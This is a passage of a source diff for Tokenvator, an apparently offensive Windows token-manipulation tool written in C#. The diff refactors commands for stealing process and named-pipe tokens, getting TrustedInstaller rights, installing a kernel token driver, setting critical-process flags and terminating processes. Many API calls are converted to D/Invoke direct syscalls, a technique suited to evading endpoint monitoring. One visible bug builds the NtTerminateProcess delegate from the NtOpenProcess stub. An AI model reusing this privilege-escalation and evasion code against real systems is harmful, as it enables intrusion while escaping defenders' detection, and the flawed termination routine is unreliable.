-        private static void _GetTrustedInstallerService(CommandLineParsing cLP, IntPtr hToken)
+        private void _GetTrustedInstallerService()
         {
-            using (TokenInformation ti = new TokenInformation(hToken))
+            using (TokenInformation ti = new TokenInformation(currentProcessToken))
             {
                 ti.SetWorkingTokenToSelf();
                 if (!ti.CheckTokenPrivilege(Winnt.SE_DEBUG_NAME))
@@ -388,7 +409,7 @@ private static void _GetTrustedInstallerService(CommandLineParsing cLP, IntPtr h
                 }
                 else
                 {
-                    using (TokenManipulation tm = new TokenManipulation(hToken))
+                    using (TokenManipulation tm = new TokenManipulation(currentProcessToken))
                     {
                         tm.SetWorkingTokenToSelf();
                         if (string.IsNullOrEmpty(cLP.Command))
@@ -401,7 +422,10 @@ private static void _GetTrustedInstallerService(CommandLineParsing cLP, IntPtr h
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Help Menue Wrapper
+        /// <summary>
+        /// Help Menue Wrapper
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private static void _Help(string input)
         {
@@ -413,11 +437,14 @@ private static void _Help(string input)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Displays various token information
+        /// <summary>
+        /// Displays various token information
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _Info(CommandLineParsing cLP, IntPtr hToken)
+        private void _Info()
         {
-            using (TokenInformation t = new TokenInformation(hToken))
+            using (TokenInformation t = new TokenInformation(currentProcessToken))
             {
                 if (cLP.Remote)
                 {
@@ -432,7 +459,7 @@ private static void _Info(CommandLineParsing cLP, IntPtr hToken)
                     t.SetWorkingTokenToSelf();
                 }
 
-                //hToken = t.GetWorkingToken();
+                //currentProcessToken = t.GetWorkingToken();
 
                 Console.WriteLine("[*] Primary Token");
                 t.GetTokenUser();
@@ -479,9 +506,13 @@ private static void _Info(CommandLineParsing cLP, IntPtr hToken)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // sc create TokenDriver binPath="C:\Windows\System32\kerneltokens.sys" type=kernel
+        /// <summary>
+        /// Installs the Token Driver
+        /// sc create TokenDriver binPath="C:\Windows\System32\kerneltokens.sys" type=kernel
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _InstallDriver(CommandLineParsing cLP)
+        private void _InstallDriver()
         {
             //string servicename = Misc.NextItem(ref command);
             //string path = Misc.NextItem(ref command);
@@ -568,36 +599,90 @@ private static void _InstallDriver(CommandLineParsing cLP)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Module to check if a process is marked as critical
+        /// <summary>
+        /// Module to check if a process is marked as critical
+        /// Converted to a mix of D/Invoke Syscalls and GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="cLP"></param>
+        /// <param name="hProcess"></param>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _IsCriticalProcess(CommandLineParsing cLP, IntPtr hProcess)
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        private void _IsCriticalProcess()
         {
+            IntPtr hProcess = new IntPtr();
+
             if (cLP.Remote)
             {
-                hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, false, (uint)cLP.ProcessID);
-                if (IntPtr.Zero == hProcess)
+                ////////////////////////////////////////////////////////////////////////////////
+                // kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, false, (uint)cLP.ProcessID);
+                ////////////////////////////////////////////////////////////////////////////////
+                IntPtr hNtOpenProcess = Generic.GetSyscallStub("NtOpenProcess");
+                MonkeyWorks.ntdll.NtOpenProcess fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
+
+                MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
+                MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID
+                {
+                    UniqueProcess = new IntPtr(cLP.ProcessID)
+                };
+
+                uint ntRetVal = 0;
+                try
                 {
-                    Misc.GetWin32Error("OpenProcess");
+                    ntRetVal = fSyscallNtOpenProcess(ref hProcess, ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, ref objectAttributes, ref clientId);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] NtOpenProcess Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
+                    return;
+                }
+
+                if (0 != ntRetVal)
+                {
+                    Misc.GetNtError("NtOpenProcess", ntRetVal);
                     return;
                 }
             }
 
+            ////////////////////////////////////////////////////////////////////////////////
+            // kernel32.IsProcessCritical(hProcess, ref bIsCritical)
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hKernel32 = Generic.GetPebLdrModuleEntry("kernel32.dll");
+            IntPtr hIsProcessCritical = Generic.GetExportAddress(hKernel32, "IsProcessCritical");
+            MonkeyWorks.kernel32.IsProcessCritical fIsProcessCritical = (MonkeyWorks.kernel32.IsProcessCritical)Marshal.GetDelegateForFunctionPointer(hIsProcessCritical, typeof(MonkeyWorks.kernel32.IsProcessCritical));
+
             bool bIsCritical = false;
-            if (!kernel32.IsProcessCritical(hProcess, ref bIsCritical))
+            bool retVal = false;
+            try
+            {
+                retVal = fIsProcessCritical(hProcess, ref bIsCritical);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NtOpenProcess Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return;
+            }
+            
+            if (!retVal)
             {
                 Misc.GetWin32Error("IsProcessCritical");
-                kernel32.CloseHandle(hProcess);
+                AccessTokens.CloseHandle(hProcess);
                 return;
             }
             Console.WriteLine("[*] Process Critical State: {0}", bIsCritical);
-            kernel32.CloseHandle(hProcess);
+            AccessTokens.CloseHandle(hProcess);
             return;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // List the loaded minifilters
+        /// <summary>
+        /// List the loaded minifilters
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _ListFilters()
+        private void _ListFilters()
         {
             using (Filters f = new Filters())
             {
@@ -619,9 +704,12 @@ private static void _ListFilters()
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // List the instances / volumes attached to for a given minifilter
+        /// <summary>
+        /// List the instances / volumes attached to for a given minifilter
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _ListFiltersInstances(CommandLineParsing cLP)
+        private void _ListFiltersInstances()
         {
             string filter;
             if (!cLP.GetData("filter", out filter))
@@ -650,13 +738,17 @@ private static void _ListFiltersInstances(CommandLineParsing cLP)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // List the privileges for a token
+        /// <summary>
+        /// List the privileges for a token
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _ListPrivileges(CommandLineParsing cLP, IntPtr hToken)
+        private void _ListPrivileges()
         {
             Console.WriteLine("Remote: " + cLP.Remote);
             Console.WriteLine("Impers: " + cLP.Impersonation);
-            using (TokenInformation ti = new TokenInformation(hToken))
+
+            using (TokenInformation ti = new TokenInformation(currentProcessToken))
             {
                 if (cLP.Remote && !cLP.Impersonation && ti.OpenProcessToken(cLP.ProcessID))
                 {
@@ -683,9 +775,12 @@ private static void _ListPrivileges(CommandLineParsing cLP, IntPtr hToken)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Logs on a user, can be used with virtual service accounts
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _LogonUser(CommandLineParsing cLP, IntPtr hToken)
+        private void _LogonUser()
         {
             string username;
             if (!cLP.GetData("username", out username))
@@ -744,7 +839,7 @@ private static void _LogonUser(CommandLineParsing cLP, IntPtr hToken)
                 }
             }
 
-            using (CreateTokens ct = new CreateTokens(hToken))
+            using (CreateTokens ct = new CreateTokens(currentProcessToken))
             {
                 string groups;
                 if (cLP.GetData("groups", out groups))
@@ -759,11 +854,14 @@ private static void _LogonUser(CommandLineParsing cLP, IntPtr hToken)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Disable and remove all the privileges on a given token
+        /// <summary>
+        /// Disable and remove all the privileges on a given token
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _NukePrivileges(CommandLineParsing cLP, IntPtr hToken)
+        private void _NukePrivileges()
         {
-            using (TokenInformation ti = new TokenInformation(hToken))
+            using (TokenInformation ti = new TokenInformation(currentProcessToken))
             {
                 if (cLP.Remote)
                 {
@@ -807,9 +905,26 @@ private static void _NukePrivileges(CommandLineParsing cLP, IntPtr hToken)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Reverts to self
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _SampleProcess()
+        private void _RevertToSelf()
+        {
+            using (TokenManipulation tm = new TokenManipulation())
+            {
+                Console.WriteLine(tm.RevertToSelf() ? "[*] Reverted token to " + WindowsIdentity.GetCurrent().Name : "[-] RevertToSelf failed");
+            }
+        }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Finds all logged on users
+        /// No conversions required
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
+        private void _SampleProcess()
         {
             Dictionary<string, uint> users = UserSessions.EnumerateTokens(false);
             Console.WriteLine("{0,-40}{1,-20}{2}", "User", "Process ID", "Process Name");
@@ -821,9 +936,12 @@ private static void _SampleProcess()
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Finds all logged on users via WMI
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _SampleProcessWMI()
+        private void _SampleProcessWMI()
         {
             Dictionary<string, uint> users = UserSessions.EnumerateTokensWMI();
             Console.WriteLine("{0,-40}{1,-20}{2}", "User", "Process ID", "Process Name");
@@ -835,10 +953,19 @@ private static void _SampleProcessWMI()
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Marks or unmarks a process as being critical
+        /// <summary>
+        /// Marks or unmarks a process as being critical
+        /// Converted to D/Invoke Syscalls
+        /// </summary>
+        /// <param name="cLP"></param>
+        /// <param name="hProcess"></param>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _SetCriticalProcess(CommandLineParsing cLP, IntPtr hProcess)
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        private void _SetCriticalProcess()
         {
+            IntPtr hProcess = new IntPtr();
+
             string sSetting;
             cLP.GetData("state", out sSetting);
 
@@ -848,40 +975,86 @@ private static void _SetCriticalProcess(CommandLineParsing cLP, IntPtr hProcess)
                 Console.WriteLine("[-] Invalid Boolean Specified: {0}", sSetting);
                 return;
             }
-            
+
             uint uSetting = Convert.ToUInt32(bSetting);
             if (cLP.Remote)
             {
-                hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_SET_INFORMATION, false, (uint)cLP.ProcessID);
-                if (IntPtr.Zero == hProcess)
+                ////////////////////////////////////////////////////////////////////////////////
+                // kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_SET_INFORMATION, false, (uint)cLP.ProcessID);
+                ////////////////////////////////////////////////////////////////////////////////
+                IntPtr hNtOpenProcess = Generic.GetSyscallStub("NtOpenProcess");
+                MonkeyWorks.ntdll.NtOpenProcess fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
+
+                MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
+                MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID
+                {
+                    UniqueProcess = new IntPtr(cLP.ProcessID)
+                };
+
+                uint retVal = 0;
+                try
                 {
-                    Misc.GetWin32Error("OpenProcess");
-                    kernel32.CloseHandle(hProcess);
+                    retVal = fSyscallNtOpenProcess(ref hProcess, ProcessThreadsApi.ProcessSecurityRights.PROCESS_SET_INFORMATION, ref objectAttributes, ref clientId);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] NtOpenProcess Generated an Exception");
+                    Console.WriteLine("[-] {0}", ex.Message);
                     return;
                 }
+
+                if (0 != retVal)
+                {
+                    Misc.GetNtError("NtOpenProcess", retVal);
+                    return;
+                }
+            }
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // ntdll.NtSetInformationProcess(hProcess, ntdll._PROCESS_INFORMATION_CLASS.ProcessBreakOnTermination, ref uSetting, (uint)System.Runtime.InteropServices.Marshal.SizeOf(typeof(uint)));
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hNtSetInformationProcess = Generic.GetSyscallStub("NtSetInformationProcess");
+            MonkeyWorks.ntdll.NtSetInformationProcess fSyscallNtSetInformationProcess = (MonkeyWorks.ntdll.NtSetInformationProcess)Marshal.GetDelegateForFunctionPointer(hNtSetInformationProcess, typeof(MonkeyWorks.ntdll.NtSetInformationProcess));
+
+            uint ntRetVal = 0;
+            try
+            {
+                ntRetVal = fSyscallNtSetInformationProcess(hProcess, MonkeyWorks.ntdll._PROCESS_INFORMATION_CLASS.ProcessBreakOnTermination, ref uSetting, (uint)Marshal.SizeOf(typeof(uint)));
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NtOpenProcess Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return;
             }
 
-            uint status = ntdll.NtSetInformationProcess(hProcess, ntdll._PROCESS_INFORMATION_CLASS.ProcessBreakOnTermination, ref uSetting, (uint)System.Runtime.InteropServices.Marshal.SizeOf(typeof(uint)));
-            if (0 != status)
+            if (0 != ntRetVal)
             {
-                Misc.GetNtError("NtSetInformationProcess", status);
-                kernel32.CloseHandle(hProcess);
+                Misc.GetNtError("NtSetInformationProcess", ntRetVal);
+                AccessTokens.CloseHandle(hProcess);
                 return;
             }
-            
+
             if (bSetting)
+            {
                 Console.WriteLine("[+] Process {0} is Marked as Critical", cLP.ProcessID);
+            }
             else
+            {
                 Console.WriteLine("[+] Process {0} is Unmarked as Critical", cLP.ProcessID);
+            }
 
-            kernel32.CloseHandle(hProcess);
+            AccessTokens.CloseHandle(hProcess);
             return;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Starts the KernelTokens Driver
+        /// <summary>
+        /// Starts the KernelTokens Driver
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _StartDriver(CommandLineParsing cLP)
+        private void _StartDriver()
         {
             string sn;
             if (!cLP.GetData("ServiceName", out sn))
@@ -890,7 +1063,6 @@ private static void _StartDriver(CommandLineParsing cLP)
                 return;
             }
 
-
             PSExec p = new PSExec(sn);
             if (!p.Connect("."))
             {
@@ -904,11 +1076,16 @@ private static void _StartDriver(CommandLineParsing cLP)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Duplicates a token from another process - either impersonates or creates a 
+        /// new process
+        /// No conversions required
+        /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        private static bool _StealToken(CommandLineParsing cLP, IntPtr hToken)
+        private bool _StealToken()
         {
-            using (TokenManipulation t = new TokenManipulation(hToken))
+            using (TokenManipulation t = new TokenManipulation(currentProcessToken))
             {
                 
                 if (string.IsNullOrWhiteSpace(cLP.Command))
@@ -937,7 +1114,7 @@ private static bool _StealToken(CommandLineParsing cLP, IntPtr hToken)
                     if (0 != cLP.ProcessID && t.OpenProcessToken(cLP.ProcessID))
                     {
                         t.SetWorkingTokenToRemote();
-                        if (!t.DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
+                        if (!t.DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, Winnt._TOKEN_TYPE.TokenPrimary))
                         {
                             return false;
                         }
@@ -963,9 +1140,12 @@ private static bool _StealToken(CommandLineParsing cLP, IntPtr hToken)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Steal a token from a named pipe, has some wierd corner cases
+        /// <summary>
+        /// Steal a token from a named pipe, has some wierd corner cases
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _StealPipeToken(CommandLineParsing cLP)
+        private void _StealPipeToken()
         {
             if (string.IsNullOrEmpty(cLP.PipeName))
             {
@@ -975,88 +1155,161 @@ private static void _StealPipeToken(CommandLineParsing cLP)
 
             if (string.IsNullOrEmpty(cLP.Command))
             {
-                
-                NamedPipes.GetPipeToken(cLP.PipeName);
+                using (NamedPipes np = new NamedPipes())
+                {
+                    np.GetPipeToken(cLP.PipeName);
+                }
+
+                Console.WriteLine("[*] Operating as {0}", WindowsIdentity.GetCurrent().Name);
             }
             else
             {
                 Console.WriteLine("[*] Running {0}", cLP.CommandAndArgs);
-                NamedPipes.GetPipeToken(cLP.PipeName, cLP.Command, cLP.Arguments);
+                using (NamedPipes np = new NamedPipes())
+                {
+                    np.GetPipeToken(cLP.PipeName, cLP.Command, cLP.Arguments);
+                }
             }
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Read command input for the Run Command
+        /// <summary>
+        /// Read command input for the Run Command
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _SubProcessStdIn()
+        private void _SubProcessStdIn()
         {
             try
             {
-                var reader = new System.IO.StreamReader(Console.OpenStandardInput());
+                var reader = new StreamReader(Console.OpenStandardInput());
                 while (!reader.EndOfStream)
+                {
                     process.StandardInput.WriteLine(reader.ReadLine());
+                }
             }
             catch (Exception ex)
             {
                 if (!(ex is ThreadAbortException))
+                {
                     Console.Error.WriteLine("GiveProcStdIn:" + ex.Message);
+                }
             }
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Read command input for the Run Command
+        /// <summary>
+        /// Read command input for the Run Command
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _SubProcessStdOut()
+        private void _SubProcessStdOut()
         {
             try
             {
-                System.IO.StreamReader reader = process.StandardOutput;
+                StreamReader reader = process.StandardOutput;
                 while (!reader.EndOfStream)
+                {
                     Console.WriteLine(reader.ReadLine());
+                }
 
                 reader = process.StandardError;
                 while (!reader.EndOfStream)
+                {
                     Console.WriteLine(reader.ReadLine());
+                }
             }
             catch (Exception ex)
             {
                 if (!(ex is ThreadAbortException))
+                {
                     Console.Error.WriteLine("ShowProcStdOut:" + ex.Message);
+                }
             }
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Terminates a given process
+        /// <summary>
+        /// Terminates a given process
+        /// Converted to D/Invoke Syscalls
+        /// </summary>
+        /// <param name="cLP"></param>
+        /// <param name="hProcess"></param>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _Terminate(CommandLineParsing cLP)
+        private void _Terminate()
         {
-            if (cLP.Remote)
+            IntPtr hProcess = new IntPtr();
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_SET_INFORMATION, false, (uint)cLP.ProcessID);
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hNtOpenProcess = Generic.GetSyscallStub("NtOpenProcess");
+            MonkeyWorks.ntdll.NtOpenProcess fSyscallNtOpenProcess = (MonkeyWorks.ntdll.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtOpenProcess));
+
+            MonkeyWorks.ntdll.OBJECT_ATTRIBUTES objectAttributes = new MonkeyWorks.ntdll.OBJECT_ATTRIBUTES();
+            MonkeyWorks.ntdll.CLIENT_ID clientId = new MonkeyWorks.ntdll.CLIENT_ID
             {
-                IntPtr hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_TERMINATE, false, (uint)cLP.ProcessID);
-                if (IntPtr.Zero == hProcess)
-                {
-                    Misc.GetWin32Error("OpenProcess");
-                    return;
-                }
-                Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
+                UniqueProcess = new IntPtr(cLP.ProcessID)
+            };
 
-                if (!kernel32.TerminateProcess(hProcess, 0))
-                {
-                    Misc.GetWin32Error("TerminateProcess");
-                    return;
-                }
-                Console.WriteLine("[+] Process Terminated");
+            uint ntRetVal = 0;
+            try
+            {
+                ntRetVal = fSyscallNtOpenProcess(ref hProcess, ProcessThreadsApi.ProcessSecurityRights.PROCESS_TERMINATE, ref objectAttributes, ref clientId);
             }
-            else
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NtOpenProcess Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return;
+            }
+
+            if (0 != ntRetVal)
+            {
+                Misc.GetNtError("NtOpenProcess", ntRetVal);
+                return;
+            }
+
+            Console.WriteLine("[*] Recieved Process Handle 0x{0}", hProcess.ToString("X4"));
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // kernel32.TerminateProcess(hProcess, 0)
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hNtTerminateProcess = Generic.GetSyscallStub("NtTerminateProcess");
+            MonkeyWorks.ntdll.NtTerminateProcess fSyscallNtTerminateProcess = (MonkeyWorks.ntdll.NtTerminateProcess)Marshal.GetDelegateForFunctionPointer(hNtOpenProcess, typeof(MonkeyWorks.ntdll.NtTerminateProcess));
+
+            ntRetVal = 0;
+            try
+            {
+                ntRetVal = fSyscallNtTerminateProcess(hProcess, 0);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NtTerminateProcess Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return;
+            }
+            finally
+            {
+                AccessTokens.CloseHandle(hProcess);
+            }
+
+            if (0 != ntRetVal)
             {
-                Console.WriteLine("[-] Unable to identify Process ID");
+                Misc.GetNtError("NtTerminateProcess", ntRetVal);
+                return;
             }
+
+            Console.WriteLine("[+] Process Terminated");
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Unfreezes a token via a driver
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _UnfreezeToken(CommandLineParsing cLP)
+        private void _UnfreezeToken()
         {
             using (TokenDriver td = new TokenDriver())
             {
@@ -1066,16 +1319,23 @@ private static void _UnfreezeToken(CommandLineParsing cLP)
                     return;
                 }
                 if (cLP.Remote)
+                {
                     td.UnFreezeToken((uint)cLP.ProcessID);
+                }
                 else
+                {
                     td.UnFreezeToken();
+                }
             }
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// Uninstalls the token driver
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _UnInstallDriver(CommandLineParsing cLP)
+        private void _UnInstallDriver()
         {
             string service;
             if (cLP.GetData("servicename", out service))
@@ -1102,9 +1362,12 @@ private static void _UnInstallDriver(CommandLineParsing cLP)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Runs a cmd prompt command
+        /// <summary>
+        /// Runs a cmd prompt command
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _Run(CommandLineParsing cLP)
+        private void _Run()
         {
             process = new Process();
             process.StartInfo.FileName = cLP.Command;
@@ -1131,9 +1394,12 @@ private static void _Run(CommandLineParsing cLP)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // This is probably going to break on certain consoles - e.g. Hangul || Kanji
+        /// <summary>
+        /// Emulates the functionality for runas /netonly
+        /// Migrated to Move this to CreateTokens & CreateProcess
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _RunAsNetOnly(CommandLineParsing cLP)
+        private void _RunAsNetOnly()
         {
             string[] domain_user;
             string domain;
@@ -1180,88 +1446,33 @@ private static void _RunAsNetOnly(CommandLineParsing cLP)
 
             if (string.IsNullOrEmpty(cLP.Command))
             {
-                IntPtr phToken;
-                bool retVal = advapi32.LogonUser(
-                    username, domain, password,
-                    Winbase.LOGON_TYPE.LOGON32_LOGON_NEW_CREDENTIALS,
-                    Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT,
-                    out phToken
-                );
-
-                if (!retVal || IntPtr.Zero == phToken)
-                {
-                    Misc.GetWin32Error("LogonUser");
-                    return;
-                }
-
-                Winbase._SECURITY_ATTRIBUTES securityAttributes = new Winbase._SECURITY_ATTRIBUTES();
-                IntPtr phNewToken;
-                advapi32.DuplicateTokenEx(
-                    phToken,
-                    (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, 
-                    ref securityAttributes,
-                    Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
-                    Winnt._TOKEN_TYPE.TokenImpersonation, 
-                    out phNewToken
-                );
-
-                kernel32.CloseHandle(phToken);
-
-                if (!retVal || IntPtr.Zero == phNewToken)
-                {
-                    Misc.GetWin32Error("DuplicateTokenEx");
-                    return;
-                }
-
-                WindowsIdentity newId = new WindowsIdentity(phNewToken);
-                WindowsImpersonationContext impersonatedUser = newId.Impersonate();
-                Console.WriteLine("[*] If you run \"info /all\", you should now see a thread token in the primary thread.");
-
-                if (!retVal)
+                using(CreateTokens ct = new CreateTokens())
                 {
-                    Misc.GetWin32Error("ImpersonateLoggedOnUser");
-                    return;
+                    ct.LogonUser(
+                        domain,
+                        username,
+                        password,
+                        Winbase.LOGON_TYPE.LOGON32_LOGON_NEW_CREDENTIALS, 
+                        string.Empty, 
+                        string.Empty
+                    );
                 }
-
-                Console.WriteLine("[+] Operating As: {0}", WindowsIdentity.GetCurrent().Name);
             }
             else
             {
                 Console.WriteLine("[*] Command: {0}", cLP.Command);
 
-                Winbase._STARTUPINFO startupInfo = new Winbase._STARTUPINFO
-                {
-                    cb = (uint)System.Runtime.InteropServices.Marshal.SizeOf(typeof(Winbase._STARTUPINFO))
-                };
-
-                Winbase._PROCESS_INFORMATION processInformation;
-                bool retVal = advapi32.CreateProcessWithLogonW(
-                    username, domain, password,
-                    Winbase.LOGON_FLAGS.LOGON_NETCREDENTIALS_ONLY,
-                    cLP.Command, 
-                    cLP.Arguments,
-                    Winbase.CREATION_FLAGS.CREATE_NEW_PROCESS_GROUP,
-                    IntPtr.Zero, 
-                    Environment.CurrentDirectory,
-                    ref startupInfo,
-                    out processInformation
-                );              
-
-                if (!retVal)
-                {
-                    Misc.GetWin32Error("CreateProcessWithLogonW");
-                    return;
-                }
-
-                Console.WriteLine("[+] Process ID: {0}", processInformation.dwProcessId);
-                Console.WriteLine("[+] Thread ID:  {0}", processInformation.dwThreadId);
+                CreateProcess.CreateProcessWithLogonW(username, domain, password, cLP.Command, cLP.Arguments);
             }
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Pass through powershell command
+        /// <summary>
+        /// Pass through powershell command
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        private static void _RunPowerShell(CommandLineParsing cLP)
+        private void _RunPowerShell()
         {
             Runspace runspace = RunspaceFactory.CreateRunspace();
             runspace.Open();
@@ -1279,7 +1490,10 @@ private static void _RunPowerShell(CommandLineParsing cLP)
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Prints the generic help menu that lists the commands
+        /// <summary>
+        /// Prints the generic help menu that lists the commands
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private static void _HelpMenu()
         {
@@ -1299,7 +1513,10 @@ private static void _HelpMenu()
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Prints an example for a specific command
+        /// <summary>
+        /// Prints an example for a specific command
+        /// No conversions required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         private static void _HelpItem(string input)
         {
diff --git a/Tokenvator/MainLoop.cs b/Tokenvator/MainLoop.cs
index b438d5a..8280064 100644
--- a/Tokenvator/MainLoop.cs
+++ b/Tokenvator/MainLoop.cs
@@ -1,18 +1,19 @@
 using System;
 using System.Diagnostics;
-using System.Linq;
+using System.Runtime.InteropServices;
 using System.Security.Principal;
 
+using DInvoke.DynamicInvoke;
+
 using Tokenvator.Plugins.Enumeration;
-using Tokenvator.Plugins.MiniFilters;
 using Tokenvator.Resources;
 
 using MonkeyWorks.Unmanaged.Headers;
-using MonkeyWorks.Unmanaged.Libraries;
-
 
 namespace Tokenvator
 {
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
     partial class MainLoop
     {
         private const string context = "(Tokens) > ";
@@ -78,16 +79,14 @@ partial class MainLoop
             {"", "", "", ""}
         };
 
-        private IntPtr hProcess;
-        private readonly IntPtr hBackup;
-        private int processID;
-        private string command;
-
-        private static Process process;
-
+        private readonly CommandLineParsing cLP;
         private readonly TabComplete console;
         private readonly bool activateTabs;
 
+        private Process process;
+
+        private IntPtr currentProcessToken;
+
         public MainLoop(bool activateTabs)
         {
             this.activateTabs = activateTabs;
@@ -96,8 +95,7 @@ public MainLoop(bool activateTabs)
                 console = new TabComplete(context, options);
             }
 
-            hProcess = kernel32.GetCurrentProcess();
-            hBackup = hProcess;
+            cLP = new CommandLineParsing();
         }
 
         ////////////////////////////////////////////////////////////////////////////////
@@ -105,62 +103,64 @@ public MainLoop(bool activateTabs)
